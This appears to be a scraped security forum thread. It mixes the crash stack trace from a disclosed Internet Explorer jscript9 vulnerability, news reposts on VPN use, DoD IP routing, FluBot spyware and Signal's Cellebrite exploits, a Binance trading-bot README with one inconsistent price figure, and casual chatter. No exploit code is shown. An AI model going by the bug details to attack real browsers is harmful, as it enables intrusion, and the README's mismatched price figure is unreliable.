    0a 053bc988 68b9ff61 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
    0b 053bc9b8 68b9cb53 jscript9!Js::InterpreterStackFrame::OP_ProfiledCallI<Js::OpLayoutCallI_OneByte>+0x121
    0c 053bc9e8 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x1b3
    0d 053bcb14 0b9a0fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242
    0e 053bcb20 68c2d743 0xb9a0fe9
    0f 053bcb60 68b4eca9 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
    10 053bcbd4 68b4ebbc jscript9!Js::JavascriptFunction::CallRootFunctionInternal+0xb5
    11 053bcc2c 68b4eb56 jscript9!Js::JavascriptFunction::CallRootFunction+0x4d
    12 053bcc74 68b4eabd jscript9!ScriptSite::CallRootFunction+0x42
    13 053bccb0 68b5256e jscript9!ScriptSite::Execute+0xae
    14 053bcd48 68b4e9aa jscript9!ScriptEngine::ExecutePendingScripts+0x1bf
    15 053bcde0 68c27cca jscript9!ScriptEngine::ParseScriptTextCore+0x32c
    16 053bce30 695a9cc1 jscript9!ScriptEngine::ParseScriptText+0x5a
    17 053bce68 694a0493 MSHTML!InitializeLocalHtmlEngine+0x1f11
    18 053bcec0 694b7fe7 MSHTML!GetWebPlatformObject+0x16c93
    19 053bcf30 694b8493 MSHTML!GetWebPlatformObject+0x2e7e7
    1a 053bd01c 694b87be MSHTML!GetWebPlatformObject+0x2ec93
    1b 053bd098 694b8146 MSHTML!GetWebPlatformObject+0x2efbe
    1c 053bd0b8 694d79d9 MSHTML!GetWebPlatformObject+0x2e946
    1d 053bd110 694d6bb9 MSHTML!UninitializeLocalHtmlEngine+0x8b49
    1e 053bd134 694d653e MSHTML!UninitializeLocalHtmlEngine+0x7d29
    1f 053bd25c 695d4891 MSHTML!UninitializeLocalHtmlEngine+0x76ae
    20 053bd27c 695d47fb MSHTML!DllGetClassObject+0x7291
    21 053bd29c 695d478d MSHTML!DllGetClassObject+0x71fb
    22 053bd2e8 695d46a7 MSHTML!DllGetClassObject+0x718d
    23 053bd300 6950dccc MSHTML!DllGetClassObject+0x70a7
    24 053bd378 6967d357 MSHTML!TravelLogCreateInstance+0x25cec
    25 053bd3c8 69510f32 MSHTML!DllCanUnloadNow+0x13957
    26 053bd3e4 76d0ef5b MSHTML!TravelLogCreateInstance+0x28f52
    27 053bd410 76d05eca USER32!_InternalCallWinProc+0x2b
    28 053bd4f4 76d03c3a USER32!UserCallWinProcCheckWow+0x33a
    29 053bd568 76d03a00 USER32!DispatchMessageWorker+0x22a
    2a 053bd574 6ad32cd4 USER32!DispatchMessageW+0x10
    2b 053bf720 6ad31db3 IEFRAME!Ordinal245+0x1cb4
    2c 053bf7e0 6a5bcb2c IEFRAME!Ordinal245+0xd93
    2d 053bf7f8 731e26ed msIso+0x1cb2c
    2e 053bf830 756cfa29 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d
    2f 053bf840 770676b4 KERNEL32!BaseThreadInitThunk+0x19
    30 053bf89c 77067684 ntdll!RtlGetAppContainerNamedObjectPath+0xe4
    31 053bf8ac 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xb4
    ############################################################

    This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2021-05-13. Disclosure at an earlier date is possible if agreed upon by all parties.

    Related CVE Numbers: CVE-2021-26419.

    Found by: ifratric@google.com

    Source
  12. This method is used in ransomware cases; they ask for modest sums, but these guys are stupid as ....
  13. Affirmative. On: Sleep easy, the passwords are not on Google. Edit: from 2016 to the present they have been notified, and most have changed their passwords; that's why the Security News section exists.
  14. There has been a heightened appetite among US consumers for VPN services throughout 2020 and into 2021.

Since March 2020 there has been an increase of VPN (Virtual Private Network) discount-related searches as Americans search for a way to feel secure online, according to a new report.

New York, NY-based coupon engine CouponFollow, part of NextGen Shopping, surveyed 1,666 US adults before the pandemic and a further 1,834 US adults in February 2021 to understand how Americans view their internet security and data privacy.

The report showed that almost seven in ten (69%) of Americans are concerned about the security of their data when using public Wi-fi, and nearly two in three (64%) are worried about it when using the internet at home. A similar percentage (65%) are concerned that their medical or financial data might be shared -- or sold on -- by their ISP.

Online privacy worries almost half (47%) of Americans who are concerned about their privacy when using public Wi-Fi. Nearly a third (30%) worry about their privacy even when using the Internet at home.

Online fraud and hacking is a concern for Americans with over one in three (35%) knowing someone who has had their social media account hacked or hijacked -- including them. Almost half of Millennials (48%) reported this happening.

In October 2020 the UK's data privacy watchdog fined the Marriott hotel chain for a data breach that could have affected up to 339 million guests. Even social media sites like Facebook have suffered data leaks.

One in three have had, or know someone who has had their password stolen, and (52%) of Millennials and Gen Z reported the same. Only 12% of Baby Boomers reported having their password stolen, and one in five (20%) had a social media account hacked or hijacked -- reflecting the amount of time they spend online.

Although one in three (35%) Americans use a VPN, 33% reported that they do not know what a VPN is.
Men are more likely to know what a VPN is, but almost half of Baby Boomers (49%) do not know what a VPN is. Even two in five (40%) of VPN users do not understand what the term VPN means.

Using the internet at work does not seem to elicit the same level of concern. This could be due to the levels of antivirus and firewall protections that their employer has implemented on their devices.

Perhaps it is due to the type of sites that people browse on their work devices. Here, less than one in three (32%) are worried about their security. Less than one in five (18%) are concerned about their privacy when browsing the web from a work device.

Over one in ten (12%) started to use a VPN in 2020, and one in five (21%) installed a VPN to enable them to work from home.

Up to 35% of Americans already use a VPN for anonymous browsing (45%), work access (45%), or for shopping online (21%). Only 12% use it for Torrenting or P2P file sharing.

As hacking attempts and breaches grow, Americans have good reason to be cautious. Parler's data leak exposed millions of posts as 70TB of data was scraped from the platform, and the ParkMobile app data breach exposed data from 21 million users.

Being ultra-careful online will be the only way to avoid being a victim of the next breach.

Via zdnet.com
  15. ^ Locally, I can't imagine the cause. Sometimes
  16. I solved it with wget. Still, I don't understand why the saved GIFs have no frames; it's not a particular link, EXIF, etc. I think the problem is with the PC.
  17. 1. Save As -> my computer -> open image.gif: static. 2. Reupload -> myhost.com -> url myhost.com/image.gif: static, in the sense that it somehow becomes a .jpg. I have to upload them to the host somehow via URL, and I want them hosted on my own server, not imgur, postimg, etc... that's why I pay. Edit: I save an image.gif from postimg.com, and when I re-upload it to imgbb.com it has no frames.
  18. Hi, what's in store for you for Christmas? On: I'm facing a small problem. I'm trying to save some GIF in Windows 10 from Opera, Chrome... and so on, but the images remain still when I open them with any viewer; same after re-upload. Thanks
  19. Something weird happened minutes before Trump left—US says it was security research. The US Department of Defense puzzled Internet experts by apparently transferring control of tens of millions of dormant IP addresses to an obscure Florida company just before President Donald Trump left the White House, but the Pentagon has finally offered a partial explanation for why it happened. The Defense Department says it still owns the addresses but that it is using a third-party company in a "pilot" project to conduct security research. The number of Pentagon-owned IP addresses announced by the company rose to 56 million by late January and 175 million by April, making it the world's largest announcer of IP addresses in the IPv4 global routing table. The Post wrote: “SWAT team of nerds” The 6-year-old DDS consists of "82 engineers, data scientists, and computer scientists" who "worked on the much-publicized 'hack the Pentagon' program" and a variety of other projects tackling some of the hardest technology problems faced by the military, a Department of Defense article said in October 2020. Goldstein has called the unit a "SWAT team of nerds." The Defense Department did not say what the unit's specific objectives are in its project with Global Resource Systems, "and Pentagon officials declined to say why Goldstein's unit had used a little-known Florida company to carry out the pilot effort rather than have the Defense Department itself 'announce' the addresses through BGP [Border Gateway Protocol] messages—a far more routine approach," the Post said. Still, the government's explanation piqued the interest of Doug Madory, director of Internet analysis at network-security company Kentik. "I interpret this to mean that the objectives of this effort are twofold," Madory wrote in a blog post Saturday. 
"First, to announce this address space to scare off any would-be squatters, and secondly, to collect a massive amount of background Internet traffic for threat intelligence." New company remains mysterious The Washington Post and Associated Press weren't able to dig up many details about Global Resource Systems. "The company did not return phone calls or emails from The Associated Press. It has no web presence, though it has the domain grscorp.com," an AP story yesterday said. "Its name doesn't appear on the directory of its Plantation, Florida, domicile, and a receptionist drew a blank when an AP reporter asked for a company representative at the office earlier this month. She found its name on a tenant list and suggested trying email. Records show the company has not obtained a business license in Plantation." The AP apparently wasn't able to track down people associated with the company. The AP said that the Pentagon "has not answered many basic questions, beginning with why it chose to entrust management of the address space to a company that seems not to have existed until September." Global Resource Systems' name "is identical to that of a firm that independent Internet fraud researcher Ron Guilmette says was sending out email spam using the very same Internet routing identifier," the AP continued. "It shut down more than a decade ago. All that differs is the type of company. This one's a limited liability corporation. The other was a corporation. Both used the same street address in Plantation, a suburb of Fort Lauderdale." The AP did find out that the Defense Department still owns the IP addresses, saying that "a Defense Department spokesman, Russell Goemaere, told the AP on Saturday that none of the newly announced space has been sold." Bigger than China Telecom and Comcast Network experts were stumped by the emergence of Global Resource Systems for a while. Madory called it "a great mystery." 
At 11:57 am EST on January 20, three minutes before the Trump administration officially came to an end, "[a]n entity that hadn't been heard from in over a decade began announcing large swaths of formerly unused IPv4 address space belonging to the US Department of Defense," Madory wrote. Global Resource Systems is labeled AS8003 and GRS-DOD in BGP records. Madory wrote: In mid-March, "astute contributors to the NANOG listserv highlighted the oddity of massive amounts of DoD address space being announced by what appeared to be a shell company," Madory noted. DoD has “massive ranges” of IPv4 space The Defense Department "was allocated numerous massive ranges of IPv4 address space" decades ago, but "only a portion of that address space was ever utilized (i.e. announced by the DoD on the Internet)," Madory wrote. Expanding on his point that the Defense Department may want to "scare off any would-be squatters," he wrote that "there is a vast world of fraudulent BGP routing out there. As I've documented over the years, various types of bad actors use unrouted address space to bypass blocklists in order to send spam and other types of malicious traffic." On the Defense Department's goal of collecting "background Internet traffic for threat intelligence," Madory noted that "there is a lot of background noise that can be scooped up when announcing large ranges of IPv4 address space." Potential routing problems The emergence of previously dormant IP addresses could lead to routing problems. In 2018, AT&T unintentionally blocked its home-Internet customers from Cloudflare's new DNS service because the Cloudflare service and the AT&T gateway were using the same IP address of 1.1.1.1. Madory wrote: Madory's conclusion was that the new statement from the Defense Department "answers some questions," but "much remains a mystery." 
It isn't clear why the Defense Department didn't simply announce the address space itself instead of using an obscure outside entity, and it's unclear why the project came "to life in the final moments of the previous administration," he wrote. But something good might come out of it, Madory added: "We likely won't get all of the answers anytime soon, but we can certainly hope that the DoD uses the threat intel gleaned from the large amounts of background traffic for the benefit of everyone. Maybe they could come to a NANOG conference and present about the troves of erroneous traffic being sent their way." Via arstechnica.com
  20. The malware is spreading rapidly through ‘missed package delivery’ SMS texts, prompting urgent scam warnings from mobile carriers.

Android mobile phone users across the U.K. are being targeted by text messages containing a particularly nasty piece of spyware called “Flubot,” according to the country’s National Cyber Security Centre.

Victims are asked to download a fake app from a malicious website.

The malware is delivered to targets through SMS texts and prompts them to install a “missed package delivery” app. Instead, it takes victims to a scam website where they download the “app” — which is really just the spyware. Once installed, it then sets about gaining permissions, stealing banking information and credentials, lifting passwords stored on the device and squirreling away various pieces of personal information. It also sends out additional text messages to the infected device’s contact list, which allows it to “go viral” — like the flu.

The U.K.’s National Cyber Security Centre (NCSC) has issued security guidance about how to identify and remove FluBot malware, while network providers including Three and Vodafone have also issued warnings to users over the text message attacks.

So far, most of the phishing texts are branded to look like they are being sent from DHL, the NCSC said, but warned, “the scam could change to abuse other company brands.” One victim posted a message posing as a link from the Royal Mail. Another user on Twitter spotted this scam “Amazon” message which they point out swaps the “o” for a zero in the link.

Telecom carriers Vodafone UK, Three UK and EE have all confirmed the scam is traversing their networks, which collectively have more than 58 million subscribers across the country.

Anyone who receives what they believe to be a scam text is advised not to click on any links and forward the text to “7726”, a “free spam-reporting line” established to combat fraud in the U.K.
Finally, delete the message and block the sender.

If a user has already clicked on the link, the NCSC warned not to enter any password or other personal information. To remove the malware from the infected device, “Perform a factory reset as soon as possible,” the NCSC guidance reads. “The process for doing this will vary based on the device manufacturer… Note that if you don’t have backups enabled, you will lose data.”

The NCSC added that if a user has entered their personal information, it’s critical to change those passwords immediately to prevent further compromise.

To prevent future attacks, NCSC said users should back up any important information, only install a minimal number of apps from trusted sources and use available virus protection offered by Google Play and others.

SMS Phishing (‘Smishing’) On the Rise

These types of SMS phishing scams, also known as “smishing,” aren’t anything new. In February, attackers were harvesting personal data of users in the U.K. with fake messages promising tax refunds for overpayment. Mobile phishing has been a booming business since the start of the COVID-19 pandemic, experts say, which they expect will only continue to grow.

Paul Ducklin, researcher at Sophos, explained why smishing is becoming such a popular choice for threat actors in discussing the February campaign.

Via threatpost.com
  21. Lockdown's getting to everyone – even the social media monkeys British domestic spy agency MI5 wants to dispel the idea it is staffed by martini-quaffing layabouts who spend implausible amounts of time lounging around top-end bars and hotels. It has therefore opened an Instagram account. News of the agency's foray into the Facebook-owned platform, which shows you heavily filtered photographs from the perspective of somebody whose world consists of estate agents' marketing photoshoots and perfume ads, came this morning as part of a recruitment drive. MI5 chief Ken McCallum said in a statement about @mi5official: "You can insert your own joke about whether we will be following you." The account can be viewed here, though to view posts on it you'll need to be a registered user. The first post by MI5 on Instagram was a photo of the entrance to its London HQ. We are sure MI5 is happy to have contributed towards Facebook's object-recognition AI project, given how the agency greedily hoovers up data about Britons' online habits in the hope of finding enemy spies, terrorists, criminals, and so on. We are told that "being more open" is the key to spy agency recruitment in the 2020s, with McCallum adding, for the Daily Telegraph: "We must get past whatever martini-drinking stereotypes may be lingering by conveying a bit more of what today's MI5 is actually like, so that people don't rule themselves out based on perceived barriers such as socio-economic background, ethnicity, sexuality, gender, disability, or which part of the country they happen to have been born in." Exactly how an Instagram account achieves that wasn't explained; the platform is famous for influencers grifters posing in bars, hotels, and holiday destinations while imperiously demanding free stuff from any business they encounter on their travels. 
The odds of MI5 becoming an influencer are probably low, though perhaps some future incarnation of James Bond's Q could become a profitable robot influencer. Lest anyone be fooled by this twee display, the agency's previous boss used his departure speech to call for E2E encryption on messaging platforms to be backdoored so his employees wouldn't have to work too hard. On the flip side, it does do some good in the world; earlier this week MI5's CPNI offshoot warned of hostile countries targeting British public-sector workers for recruitment as informants via LinkedIn. MI5 is also capable of being too sneaky: Surveyors from BT's mobile arm, EE, nearly proposed installing a Huawei mobile mast on the roof of a secret agency data centre in West London. ® Via theregister.com
  22. Automated Binance trading bot with trailing buy/sell strategy

This is a test project. I am just testing my code.

Warnings

I cannot guarantee whether you can make money or not. So use it at your own risk! I have no responsibility for any loss or hardship incurred directly or indirectly by using this code.

Before updating the bot, make sure to record the last buy price in the note. It may lose the configuration or last buy price records.

Breaking Changes

As I introduce a new feature, I did lots of refactoring the code including settings. If the bot version is lower than the version 0.0.57, then the update will cause you to lose your settings and the last buy price records. You must write down settings and the last buy price records and re-configure after the upgrade. If you experience any issue, simply delete all docker volumes/images and re-launch the bot.

How it works

Trailing Buy/Sell Bot

This bot is using the concept of trailing buy/sell order which allows following the price fall/rise.

The bot can monitor multiple symbols. Each symbol will be monitored per second.

The bot is only tested and working with USDT pair in the FIAT market such as BTCUSDT, ETHUSDT. You can add more FIAT symbols like BUSD, AUD from the frontend. However, I didn't test in the live server. So use at your own risk.

The bot is using MongoDB to provide a persistence database. However, it does not use the latest MongoDB to support Raspberry Pi 32bit. Used MongoDB version is 3.2.20, which is provided by apcheamitru.

Buy Signal

The bot will continuously monitor the lowest value for the period of the candles. Once the current price reaches the lowest price, then the bot will place a STOP-LOSS-LIMIT order to buy. If the current price continuously falls, then the bot will cancel the previous order and re-place the new STOP-LOSS-LIMIT order with the new price.

The bot will not place a buy order if it has enough coin (typically over $10 worth) to sell when it reaches the trigger price for selling.

Buy Scenario

Let's say the buy configurations are set as below:

    Maximum purchase amount: $50
    Trigger percentage: 1.005 (0.5%)
    Stop price percentage: 1.01 (1.0%)
    Limit price percentage: 1.011 (1.1%)

And the market is as below:

    Current price: $101
    Lowest price: $100
    Trigger price: $100.5

Then the bot will not place an order because the trigger price ($100.5) is less than the current price ($101).

In the next tick, the market changes as below:

    Current price: $100
    Lowest price: $100
    Trigger price: $100.5

The bot will place new STOP-LOSS-LIMIT order for buying because the current price ($100) is less than the trigger price ($100.5). For the simple calculation, I do not take an account for the commission. In real trading, the quantity may be different. The new buy order will be placed as below:

    Stop price: $100 * 1.01 = $101
    Limit price: $100 * 1.011 = $101.1
    Quantity: 0.49

In the next tick, the market changes as below:

    Current price: $99
    Current limit price: $99 * 1.011 = 100.089
    Open order stop price: $101

As the open order's stop price ($101) is higher than the current limit price ($100.089), the bot will cancel the open order and place new STOP-LOSS-LIMIT order as below:

    Stop price: $99 * 1.01 = $99.99
    Limit price: $99 * 1.011 = $100.089
    Quantity: 0.49

If the price continuously falls, then the new buy order will be placed with the new price.

And if the market changes as below in the next tick:

    Current price: $100

Then the current price reaches the stop price ($99.99); hence, the order will be executed with the limit price ($100.089).

Sell Signal

If there is enough balance for selling and the last buy price is recorded in the bot, then the bot will start monitoring the sell signal. Once the current price reaches the trigger price, then the bot will place a STOP-LOSS-LIMIT order to sell. If the current price continuously rises, then the bot will cancel the previous order and re-place the new STOP-LOSS-LIMIT order with the new price.

If the coin is worth less than typically $10 (minimum notional value), then the bot will remove the last buy price because Binance does not allow placing an order of less than $10.

If the bot does not have a record for the last buy price, the bot will not sell the coin.

Sell Scenario

Let's say the sell configurations are set as below:

    Trigger percentage: 1.05 (5.0%)
    Stop price percentage: 0.98 (-2.0%)
    Limit price percentage: 0.979 (-2.1%)

And the market is as below:

    Coin owned: 0.5
    Current price: $100
    Last buy price: $100
    Trigger price: $100 * 1.05 = $105

Then the bot will not place an order because the trigger price ($105) is higher than the current price ($100).

If the price is continuously falling, then the bot will keep monitoring until the price reaches the trigger price.

In the next tick, the market changes as below:

    Current price: $105
    Trigger price: $105

The bot will place new STOP-LOSS-LIMIT order for selling because the current price ($105) is higher than or equal to the trigger price ($105). For the simple calculation, I do not take an account for the commission. In real trading, the quantity may be different. The new sell order will be placed as below:

    Stop price: $105 * 0.98 = $102.9
    Limit price: $105 * 0.979 = $102.795
    Quantity: 0.5

In the next tick, the market changes as below:

    Current price: $106
    Current limit price: $103.774
    Open order stop price: $102.29

As the open order's stop price ($102.29) is less than the current limit price ($103.774), the bot will cancel the open order and place new STOP-LOSS-LIMIT order as below:

    Stop price: $106 * 0.98 = $103.88
    Limit price: $106 * 0.979 = $103.774
    Quantity: 0.5

If the price continuously rises, then the new sell order will be placed with the new price.

And if the market changes as below in the next tick:

    Current price: $103

Then the current price reaches the stop price ($103.88); hence, the order will be executed with the limit price ($103.774).

Frontend + WebSocket

React.js based frontend communicating via Web Socket:

    List monitoring coins with buy/sell signals/open orders
    View account balances
    Manage global/symbol settings
    Delete caches that are not monitored
    Link to public URL
    Support Add to Home Screen

Environment Parameters

Use environment parameters to adjust parameters. Check /config/custom-environment-variables.json to see list of available environment parameters.

Or use the frontend to adjust configurations after launching the application.

How to use

1. Create .env file based on .env.dist.

2. Check docker-compose.yml for BINANCE_MODE environment parameter

3. Launch the application with docker-compose

    git pull
    docker-compose up -d

or using the latest build image from DockerHub

    git pull
    docker-compose -f docker-compose.server.yml pull
    docker-compose -f docker-compose.server.yml up -d

or if using Raspberry Pi 32bit. Must build again for Raspberry Pi.

    git pull
    docker build . --build-arg NODE_ENV=production --target production-stage -t chrisleekr/binance-trading-bot:latest
    docker-compose -f docker-compose.rpi.yml up -d

4. Open browser http://0.0.0.0:8080 to see the frontend

When launching the application, it will notify public URL to the Slack.

Install via Stackfile

    In Portainer create new Stack
    Copy content of docker-stack.yml or upload the file
    Set environment keys for binance-bot in the docker-stack.yml
    Launch and open browser http://0.0.0.0:8080 to see the frontend

Screenshots: Frontend Desktop; Sample Trade (Chart, Buy Orders, Sell Orders); Last 30 days trade (Trade History, PNL Analysis)

Changes & Todo

Please refer to CHANGELOG.md to view the past changes.

    Update the bot to monitor all coins every second - #52
    Display release version to the frontend - #59
    Improve frontend & settings UI - #93 #85
    Support all symbols - #104
    Improve sell strategy with conditional stop price percentage based on the profit percentage - #94
    Add sudden drop buy strategy - #67
    Improve buy strategy with restricting purchase if the price is close to ATH - #82
    Add minimum required order amount - #84
    Add manual buy/sell feature - #100
    Add stop loss feature - #99
    Support multilingual frontend - #56
    Reset global configuration to initial configuration - #97
    Add frontend option to disable sorting
    Allow browser notification in the frontend
    Secure frontend with the password
    Develop simple setup screen for secrets

Acknowledgments

@d0x2f @Maxoos @OOtta @ienthach @PlayeTT @chopeta @santoshbmath @BramFr

Contributors

chrisleekr, Romuald R., hipposen, thamlth

Download binance-trading-bot-master.zip

or

git clone https://github.com/chrisleekr/binance-trading-bot.git

Source
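The README's buy scenario above, replayed tick by tick as an added example (this is not code from the binance-trading-bot repository). The function names, the 3-decimal price rounding and the 0.01 quantity step are assumptions made for the illustration; it also flags the case the README does not walk through, where the price jumps past the limit price at the moment the stop is hit.

```javascript
// Added illustration: replays the README's trailing-buy scenario.
// Not the project's code; all names here are hypothetical.

// Round prices to 3 decimals so 99 * 1.01 compares as 99.99 instead of
// 99.99000000000001 (assumed precision; real symbols define their own).
const round3 = (x) => Math.round(x * 1000) / 1000;
// Assumed quantity step of 0.01, rounded down so the order value never
// exceeds the maximum purchase amount.
const floor2 = (x) => Math.floor(x * 100) / 100;

function simulateTrailingBuy(prices, candleLowest, cfg) {
  const events = [];
  let lowest = candleLowest; // lowest price over the candle period
  let order = null;          // the single open STOP-LOSS-LIMIT buy order

  const buildOrder = (price) => {
    const stop = round3(price * cfg.stopPct);
    const limit = round3(price * cfg.limitPct);
    return { stop, limit, qty: floor2(cfg.maxPurchase / limit) };
  };

  for (const [tick, price] of prices.entries()) {
    lowest = Math.min(lowest, price);
    let action = 'none';

    if (order === null) {
      // No open order: buy signal when price is at or below lowest * trigger.
      const trigger = round3(lowest * cfg.triggerPct);
      if (price <= trigger) {
        order = buildOrder(price);
        action = 'place';
      }
    } else if (price >= order.stop) {
      // Stop reached: the exchange turns the order into a limit buy.
      // It fills only if the market is still at or below the limit price.
      action = price <= order.limit ? 'fill' : 'stop-hit-unfilled';
    } else if (order.stop > round3(price * cfg.limitPct)) {
      // Price kept falling: the old stop is now above the new limit,
      // so cancel and re-place the order lower (the "trailing" step).
      order = buildOrder(price);
      action = 'replace';
    }

    events.push({ tick, price, action, ...(order || {}) });
    if (action === 'fill' || action === 'stop-hit-unfilled') break;
  }
  return events;
}

// The README's configuration and price sequence: $101, $100, $99, $100.
const README_CFG = { maxPurchase: 50, triggerPct: 1.005, stopPct: 1.01, limitPct: 1.011 };

function readmeBuyScenario() {
  return simulateTrailingBuy([101, 100, 99, 100], 100, README_CFG);
}

console.table(readmeBuyScenario());
```

A price sequence such as 100, 99, 105 ends in `stop-hit-unfilled`: the stop at $99.99 triggers, but $105 is above the $100.089 limit, so the order rests unfilled instead of executing.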
  23. One of the biggest encrypted chat apps in the world just showed how a device used to decrypt messages can be hacked and tampered with.

Moxie Marlinspike, the founder of the popular encrypted chat app Signal, claims to have hacked devices made by the phone unlocking company Cellebrite, which has famously worked with cops to circumvent encryption such as Signal's.

In a blog post Wednesday, Marlinspike not only published details of new exploits for Cellebrite devices, but seemed to suggest that Signal's code could be theoretically altered to hack Cellebrite devices en masse.

Marlinspike claims (whether you believe this portion of the post or not is up to you) that while he was on a walk he happened to find a Cellebrite phone unlocking device:

Cellebrite devices are used by cops to unlock iPhones in order to gather evidence from encrypted devices. This can include photos and messages on the device, potentially including Signal messages.

Along with his colleagues, Marlinspike analyzed the device and found that it included several vulnerabilities that could allow an attacker to include an "otherwise innocuous file in an app" that when it gets scanned by a Cellebrite device exploits it and tampers with the device and the data it can access.

To be clear, this is a pretty ballsy show of force. Marlinspike published details about the exploits outside of normal "responsible disclosure" guidelines and suggested that he is willing to share details of the vulnerabilities as long as Cellebrite does the same with all the bugs the company uses to unlock phones, "now and in the future."

In a slightly nebulous final paragraph, Marlinspike said that future versions of Signal will include files that "are never used for anything inside Signal and never interact with Signal software or data," perhaps implying these could be designed to tamper with Cellebrite devices.
We reached out to Signal to ask them to clarify what Marlinspike meant exactly in the last paragraph of his blog post. Cellebrite did not immediately respond to a request for comment. In their analysis of the device, Signal researchers also found that it contained packages signed by Apple, and likely extracted from the Windows installer for iTunes version 12.9.0.167. According to Marlinspike, this could be a copyright violation. Via vice.com
  24. Kev

    European funds

    Off: then what are you doing here? Otherwise: work, money, patience, and an Xbox, whatever you want
  25. Kev

    European funds

    I haven't read what the ghost wrote. If you later have a company and can prove you've been active, you get funds very easily. PS: many ask for a commission. PS2: be careful what you sign.